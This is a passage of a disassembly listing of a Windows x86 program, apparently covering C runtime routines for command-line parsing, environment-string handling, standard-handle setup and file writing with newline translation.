loc_41DCC9: ; CODE XREF: sub_41DC74+4E�j
mov esi, dword_4811A8
push ebp
jmp short loc_41DCFC
; ---------------------------------------------------------------------------
loc_41DCD2: ; CODE XREF: sub_41DC74+8A�j
push esi
call sub_419D00
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41DCFA
push ebp
call sub_416DAF
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41DD25
push esi
push eax
call sub_41BF70
pop ecx
pop ecx
add edi, 4
loc_41DCFA: ; CODE XREF: sub_41DC74+6B�j
add esi, ebp
loc_41DCFC: ; CODE XREF: sub_41DC74+5C�j
cmp [esi], bl
jnz short loc_41DCD2
push dword_4811A8
call sub_416C97
mov dword_4811A8, ebx
mov [edi], ebx
mov dword_48296C, 1
xor eax, eax
loc_41DD1F: ; CODE XREF: sub_41DC74+C5�j
pop ecx
pop ebp
loc_41DD21: ; CODE XREF: sub_41DC74+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41DD25: ; CODE XREF: sub_41DC74+78�j
push dword_481184
call sub_416C97
mov dword_481184, ebx
or eax, 0FFFFFFFFh
jmp short loc_41DD1F
sub_41DC74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD3B proc near ; CODE XREF: sub_41DEA7+54�p
; sub_41DEA7+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41DD5E
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41DD5E: ; CODE XREF: sub_41DD3B+18�j
; sub_41DD3B+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41DD71
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41DD9E
; ---------------------------------------------------------------------------
loc_41DD71: ; CODE XREF: sub_41DD3B+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41DD7C
mov cl, [eax]
mov [edi], cl
inc edi
loc_41DD7C: ; CODE XREF: sub_41DD3B+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_481701[ebx], 4
jz short loc_41DD97
inc dword ptr [esi]
test edi, edi
jz short loc_41DD96
mov bl, [eax]
mov [edi], bl
inc edi
loc_41DD96: ; CODE XREF: sub_41DD3B+54�j
inc eax
loc_41DD97: ; CODE XREF: sub_41DD3B+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41DDD0
loc_41DD9E: ; CODE XREF: sub_41DD3B+34�j
test edx, edx
jnz short loc_41DD5E
cmp cl, 20h
jz short loc_41DDAC
cmp cl, 9
jnz short loc_41DD5E
loc_41DDAC: ; CODE XREF: sub_41DD3B+6A�j
test edi, edi
jz short loc_41DDB4
and byte ptr [edi-1], 0
loc_41DDB4: ; CODE XREF: sub_41DD3B+73�j
; sub_41DD3B+96�j
and [ebp+var_4], 0
loc_41DDB8: ; CODE XREF: sub_41DD3B+157�j
cmp byte ptr [eax], 0
jz loc_41DE97
loc_41DDC1: ; CODE XREF: sub_41DD3B+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41DDCD
cmp cl, 9
jnz short loc_41DDD3
loc_41DDCD: ; CODE XREF: sub_41DD3B+8B�j
inc eax
jmp short loc_41DDC1
; ---------------------------------------------------------------------------
loc_41DDD0: ; CODE XREF: sub_41DD3B+61�j
dec eax
jmp short loc_41DDB4
; ---------------------------------------------------------------------------
loc_41DDD3: ; CODE XREF: sub_41DD3B+90�j
cmp byte ptr [eax], 0
jz loc_41DE97
cmp [ebp+arg_0], 0
jz short loc_41DDEB
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41DDEB: ; CODE XREF: sub_41DD3B+A5�j
inc dword ptr [ebx]
loc_41DDED: ; CODE XREF: sub_41DD3B+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41DDF6
; ---------------------------------------------------------------------------
loc_41DDF4: ; CODE XREF: sub_41DD3B+BE�j
inc eax
inc edx
loc_41DDF6: ; CODE XREF: sub_41DD3B+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41DDF4
cmp byte ptr [eax], 22h
jnz short loc_41DE26
test dl, 1
jnz short loc_41DE24
cmp [ebp+var_4], 0
jz short loc_41DE17
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41DE17
mov eax, ecx
jmp short loc_41DE19
; ---------------------------------------------------------------------------
loc_41DE17: ; CODE XREF: sub_41DD3B+CE�j
; sub_41DD3B+D6�j
xor ebx, ebx
loc_41DE19: ; CODE XREF: sub_41DD3B+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41DE24: ; CODE XREF: sub_41DD3B+C8�j
shr edx, 1
loc_41DE26: ; CODE XREF: sub_41DD3B+C3�j
test edx, edx
jz short loc_41DE37
loc_41DE2A: ; CODE XREF: sub_41DD3B+FA�j
test edi, edi
jz short loc_41DE32
mov byte ptr [edi], 5Ch
inc edi
loc_41DE32: ; CODE XREF: sub_41DD3B+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41DE2A
loc_41DE37: ; CODE XREF: sub_41DD3B+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41DE85
cmp [ebp+var_4], 0
jnz short loc_41DE4D
cmp cl, 20h
jz short loc_41DE85
cmp cl, 9
jz short loc_41DE85
loc_41DE4D: ; CODE XREF: sub_41DD3B+106�j
test ebx, ebx
jz short loc_41DE7F
test edi, edi
jz short loc_41DE6E
movzx edx, cl
test byte_481701[edx], 4
jz short loc_41DE67
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41DE67: ; CODE XREF: sub_41DD3B+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41DE7D
; ---------------------------------------------------------------------------
loc_41DE6E: ; CODE XREF: sub_41DD3B+118�j
movzx ecx, cl
test byte_481701[ecx], 4
jz short loc_41DE7D
inc eax
inc dword ptr [esi]
loc_41DE7D: ; CODE XREF: sub_41DD3B+131�j
; sub_41DD3B+13D�j
inc dword ptr [esi]
loc_41DE7F: ; CODE XREF: sub_41DD3B+114�j
inc eax
jmp loc_41DDED
; ---------------------------------------------------------------------------
loc_41DE85: ; CODE XREF: sub_41DD3B+100�j
; sub_41DD3B+10B�j ...
test edi, edi
jz short loc_41DE8D
and byte ptr [edi], 0
inc edi
loc_41DE8D: ; CODE XREF: sub_41DD3B+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41DDB8
; ---------------------------------------------------------------------------
loc_41DE97: ; CODE XREF: sub_41DD3B+80�j
; sub_41DD3B+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41DEA1
and dword ptr [eax], 0
loc_41DEA1: ; CODE XREF: sub_41DD3B+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41DD3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEA7 proc near ; CODE XREF: .text:0041874D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_482978, edi
jnz short loc_41DEBE
call sub_41D44B
loc_41DEBE: ; CODE XREF: sub_41DEA7+10�j
and byte_481434, 0
push 104h
mov esi, offset dword_481330
push esi
push edi
call dword_42200C ; GetModuleFileNameA
mov eax, dword_482968
cmp eax, edi
mov dword_481194, esi
jz short loc_41DEED
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41DEEF
loc_41DEED: ; CODE XREF: sub_41DEA7+3D�j
mov ebx, esi
loc_41DEEF: ; CODE XREF: sub_41DEA7+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41DD3B
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_416DAF
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41DF1F
or eax, 0FFFFFFFFh
jmp short loc_41DF44
; ---------------------------------------------------------------------------
loc_41DF1F: ; CODE XREF: sub_41DEA7+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41DD3B
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_481178, eax
pop ecx
mov dword_48117C, edi
xor eax, eax
loc_41DF44: ; CODE XREF: sub_41DEA7+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DEA7 endp
; =============== S U B R O U T I N E =======================================
sub_41DF49 proc near ; CODE XREF: .text:00418743�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_481438
push ebx
push ebp
push esi
push edi
mov edi, dword_4221CC
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41DF92
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41DF79
mov dword_481438, 1
jmp short loc_41DF97
; ---------------------------------------------------------------------------
loc_41DF79: ; CODE XREF: sub_41DF49+22�j
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41DF8D
mov eax, ebp
mov dword_481438, eax
jmp short loc_41DF92
; ---------------------------------------------------------------------------
loc_41DF8D: ; CODE XREF: sub_41DF49+39�j
mov eax, dword_481438
loc_41DF92: ; CODE XREF: sub_41DF49+1A�j
; sub_41DF49+42�j
cmp eax, 1
jnz short loc_41E014
loc_41DF97: ; CODE XREF: sub_41DF49+2E�j
cmp esi, ebx
jnz short loc_41DFA3
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41E01C
loc_41DFA3: ; CODE XREF: sub_41DF49+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41DFB8
loc_41DFAA: ; CODE XREF: sub_41DF49+66�j
; sub_41DF49+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41DFAA
add eax, ebp
cmp [eax], bx
jnz short loc_41DFAA
loc_41DFB8: ; CODE XREF: sub_41DF49+5F�j
mov edi, dword_4220D8
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41E009
push ebp
call sub_416DAF
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41E009
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41E005
push [esp+18h+var_8]
call sub_416C97
pop ecx
mov [esp+18h+var_8], ebx
loc_41E005: ; CODE XREF: sub_41DF49+AC�j
mov ebx, [esp+18h+var_8]
loc_41E009: ; CODE XREF: sub_41DF49+8C�j
; sub_41DF49+9B�j
push esi
call dword_4221C8 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41E064
; ---------------------------------------------------------------------------
loc_41E014: ; CODE XREF: sub_41DF49+4C�j
cmp eax, ebp
jz short loc_41E020
cmp eax, ebx
jz short loc_41E020
loc_41E01C: ; CODE XREF: sub_41DF49+58�j
; sub_41DF49+E1�j
xor eax, eax
jmp short loc_41E064
; ---------------------------------------------------------------------------
loc_41E020: ; CODE XREF: sub_41DF49+CD�j
; sub_41DF49+D1�j
call dword_4221C4 ; GetEnvironmentStringsA
mov esi, eax
cmp esi, ebx
jz short loc_41E01C
cmp [esi], bl
jz short loc_41E03A
loc_41E030: ; CODE XREF: sub_41DF49+EA�j
; sub_41DF49+EF�j
inc eax
cmp [eax], bl
jnz short loc_41E030
inc eax
cmp [eax], bl
jnz short loc_41E030
loc_41E03A: ; CODE XREF: sub_41DF49+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_416DAF
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41E050
xor edi, edi
jmp short loc_41E05B
; ---------------------------------------------------------------------------
loc_41E050: ; CODE XREF: sub_41DF49+101�j
push ebp
push esi
push edi
call sub_41B490
add esp, 0Ch
loc_41E05B: ; CODE XREF: sub_41DF49+105�j
push esi
call dword_4221C0 ; FreeEnvironmentStringsA
mov eax, edi
loc_41E064: ; CODE XREF: sub_41DF49+C9�j
; sub_41DF49+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41DF49 endp
; =============== S U B R O U T I N E =======================================
sub_41E06B proc near ; CODE XREF: .text:00418727�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_416DAF
test eax, eax
pop ecx
jnz short loc_41E087
or eax, 0FFFFFFFFh
jmp loc_41E264
; ---------------------------------------------------------------------------
loc_41E087: ; CODE XREF: sub_41E06B+12�j
mov dword_4815E0, eax
mov dword_4815D0, 20h
lea ecx, [eax+480h]
jmp short loc_41E0BC
; ---------------------------------------------------------------------------
loc_41E09E: ; CODE XREF: sub_41E06B+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_4815E0
add eax, 24h
add ecx, 480h
loc_41E0BC: ; CODE XREF: sub_41E06B+31�j
cmp eax, ecx
jb short loc_41E09E
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call dword_422168 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41E1C3
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41E1C3
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41E0FD
mov edi, eax
loc_41E0FD: ; CODE XREF: sub_41E06B+8E�j
cmp dword_4815D0, edi
jge short loc_41E153
mov esi, offset dword_4815E4
loc_41E10A: ; CODE XREF: sub_41E06B+DE�j
push ebx
call sub_416DAF
test eax, eax
pop ecx
jz short loc_41E14D
add dword_4815D0, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41E13C
; ---------------------------------------------------------------------------
loc_41E126: ; CODE XREF: sub_41E06B+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41E13C: ; CODE XREF: sub_41E06B+B9�j
cmp eax, ecx
jb short loc_41E126
add esi, 4
cmp dword_4815D0, edi
jl short loc_41E10A
jmp short loc_41E153
; ---------------------------------------------------------------------------
loc_41E14D: ; CODE XREF: sub_41E06B+A8�j
mov edi, dword_4815D0
loc_41E153: ; CODE XREF: sub_41E06B+98�j
; sub_41E06B+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41E1C3
loc_41E159: ; CODE XREF: sub_41E06B+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41E1B8
mov cl, [ebp+0]
test cl, 1
jz short loc_41E1B8
test cl, 8
jnz short loc_41E17C
push eax
call dword_4221D4 ; GetFileType
test eax, eax
jz short loc_41E1B8
loc_41E17C: ; CODE XREF: sub_41E06B+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jz short loc_41E1E3
inc dword ptr [esi+8]
loc_41E1B8: ; CODE XREF: sub_41E06B+F7�j
; sub_41E06B+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41E159
loc_41E1C3: ; CODE XREF: sub_41E06B+69�j
; sub_41E06B+75�j ...
xor ebx, ebx
loc_41E1C5: ; CODE XREF: sub_41E06B+1E2�j
mov ecx, dword_4815E0
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41E245
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41E1E8
push 0FFFFFFF6h
pop eax
jmp short loc_41E1F2
; ---------------------------------------------------------------------------
loc_41E1E3: ; CODE XREF: sub_41E06B+148�j
; sub_41E06B+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41E261
; ---------------------------------------------------------------------------
loc_41E1E8: ; CODE XREF: sub_41E06B+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41E1F2: ; CODE XREF: sub_41E06B+176�j
push eax
call dword_4221B8 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41E23F
push edi
call dword_4221D4 ; GetFileType
test eax, eax
jz short loc_41E23F
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41E21D
or byte ptr [esi+4], 40h
jmp short loc_41E226
; ---------------------------------------------------------------------------
loc_41E21D: ; CODE XREF: sub_41E06B+1AA�j
cmp eax, 3
jnz short loc_41E226
or byte ptr [esi+4], 8
loc_41E226: ; CODE XREF: sub_41E06B+1B0�j
; sub_41E06B+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jz short loc_41E1E3
inc dword ptr [esi+8]
jmp short loc_41E249
; ---------------------------------------------------------------------------
loc_41E23F: ; CODE XREF: sub_41E06B+193�j
; sub_41E06B+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41E249
; ---------------------------------------------------------------------------
loc_41E245: ; CODE XREF: sub_41E06B+169�j
or byte ptr [esi+4], 80h
loc_41E249: ; CODE XREF: sub_41E06B+1D2�j
; sub_41E06B+1D8�j
inc ebx
cmp ebx, 3
jl loc_41E1C5
push dword_4815D0
call dword_4221D0 ; SetHandleCount
xor eax, eax
loc_41E261: ; CODE XREF: sub_41E06B+17B�j
pop edi
pop esi
pop ebp
loc_41E264: ; CODE XREF: sub_41E06B+17�j
pop ebx
add esp, 48h
retn
sub_41E06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E269 proc near ; CODE XREF: sub_41E40E+52�p
; sub_42098E+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_432A48
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41E292
xor eax, eax
jmp loc_41E400
; ---------------------------------------------------------------------------
loc_41E292: ; CODE XREF: sub_41E269+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:4815E0h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41E2C5
push 2
push edi
push edi
push [ebp+arg_0]
call sub_4208B6
add esp, 10h
loc_41E2C5: ; CODE XREF: sub_41E269+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41E397
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41E3D2
loc_41E2E5: ; CODE XREF: sub_41E269+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41E2F4: ; CODE XREF: sub_41E269+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41E320
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41E311
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41E311: ; CODE XREF: sub_41E269+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41E2F4
loc_41E320: ; CODE XREF: sub_41E269+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_41E360
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41E369
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41E2E5
jmp short loc_41E36B
; ---------------------------------------------------------------------------
loc_41E360: ; CODE XREF: sub_41E269+DC�j
call dword_422004 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_41E369: ; CODE XREF: sub_41E269+E6�j
xor edi, edi
loc_41E36B: ; CODE XREF: sub_41E269+F5�j
; sub_41E269+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41E3FB
cmp [ebp+var_8], edi
jz short loc_41E3D2
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41E3C4
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
mov [eax], esi
jmp short loc_41E3CD
; ---------------------------------------------------------------------------
loc_41E397: ; CODE XREF: sub_41E269+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_41E3B9
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41E36B
; ---------------------------------------------------------------------------
loc_41E3B9: ; CODE XREF: sub_41E269+143�j
call dword_422004 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
jmp short loc_41E36B
; ---------------------------------------------------------------------------
loc_41E3C4: ; CODE XREF: sub_41E269+118�j
push [ebp+var_8]
call sub_41B947
pop ecx
loc_41E3CD: ; CODE XREF: sub_41E269+12C�j
; sub_41E269+190�j
or eax, 0FFFFFFFFh
jmp short loc_41E3FE
; ---------------------------------------------------------------------------
loc_41E3D2: ; CODE XREF: sub_41E269+76�j
; sub_41E269+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41E3E7
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41E3E7
xor eax, eax
jmp short loc_41E3FE
; ---------------------------------------------------------------------------
loc_41E3E7: ; CODE XREF: sub_41E269+170�j
; sub_41E269+178�j
call sub_41B935
mov dword ptr [eax], 1Ch
call sub_41B93E
mov [eax], edi
jmp short loc_41E3CD
; ---------------------------------------------------------------------------
loc_41E3FB: ; CODE XREF: sub_41E269+107�j
sub eax, [ebp+var_18]
loc_41E3FE: ; CODE XREF: sub_41E269+167�j
; sub_41E269+17C�j
pop esi
pop ebx
loc_41E400: ; CODE XREF: sub_41E269+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_41C526
leave
retn
sub_41E269 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E40E proc near ; CODE XREF: sub_418805+98�p
; sub_418805+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041E49D SIZE 0000001C BYTES
push 0Ch
push offset stru_42C9D0
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815D0
jnb short loc_41E49D
mov eax, ebx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E49D
push ebx
call sub_41F54C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E46D
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41E269
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41E484
; ---------------------------------------------------------------------------
loc_41E46D: ; CODE XREF: sub_41E40E+49�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41E484: ; CODE XREF: sub_41E40E+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E495
mov eax, [ebp+var_1C]
jmp short loc_41E4B3
sub_41E40E endp
; =============== S U B R O U T I N E =======================================
sub_41E492 proc near ; DATA XREF: .text:stru_42C9D0�o
mov ebx, [ebp+8]
sub_41E492 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E495 proc near ; CODE XREF: sub_41E40E+7A�p
push ebx
call sub_41F5BF
pop ecx
retn
sub_41E495 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E40E
loc_41E49D: ; CODE XREF: sub_41E40E+15�j
; sub_41E40E+35�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41E4B3: ; CODE XREF: sub_41E40E+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E40E
; =============== S U B R O U T I N E =======================================
sub_41E4B9 proc near ; CODE XREF: sub_418805+6F�p
; sub_41B136+34�p ...
arg_0 = dword ptr 4
inc dword_481318
push 1000h
call sub_416DAF
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41E4E2
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41E4F3
; ---------------------------------------------------------------------------
loc_41E4E2: ; CODE XREF: sub_41E4B9+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41E4F3: ; CODE XREF: sub_41E4B9+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41E4B9 endp
; =============== S U B R O U T I N E =======================================
sub_41E4FD proc near ; CODE XREF: sub_418805+64�p
; sub_41C534+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4815D0
jb short loc_41E50C
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E50C: ; CODE XREF: sub_41E4FD+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41E4FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E527 proc near ; CODE XREF: sub_41E587+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41E538
xor eax, eax
jmp short loc_41E584
; ---------------------------------------------------------------------------
loc_41E538: ; CODE XREF: sub_41E527+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41E551
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41E576
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41E584
; ---------------------------------------------------------------------------
loc_41E551: ; CODE XREF: sub_41E527+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call dword_4220D8 ; WideCharToMultiByte
cmp eax, esi
jz short loc_41E576
cmp [ebp+arg_4], esi
jz short loc_41E584
loc_41E576: ; CODE XREF: sub_41E527+21�j
; sub_41E527+48�j
call sub_41B935
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41E584: ; CODE XREF: sub_41E527+F�j
; sub_41E527+28�j ...
pop esi
pop ebp
retn
sub_41E527 endp
; =============== S U B R O U T I N E =======================================
sub_41E587 proc near ; CODE XREF: sub_4189AC+317�p
; sub_4189AC+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41E59C
call sub_419F8E
loc_41E59C: ; CODE XREF: sub_41E587+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41E527
add esp, 0Ch
retn
sub_41E587 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5AE proc near ; CODE XREF: sub_41915F+23�p
; sub_4191D0+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041E661 SIZE 00000008 BYTES
push 10h
push offset stru_42C9E0
call __SEH_prolog
mov esi, [ebp+arg_0]
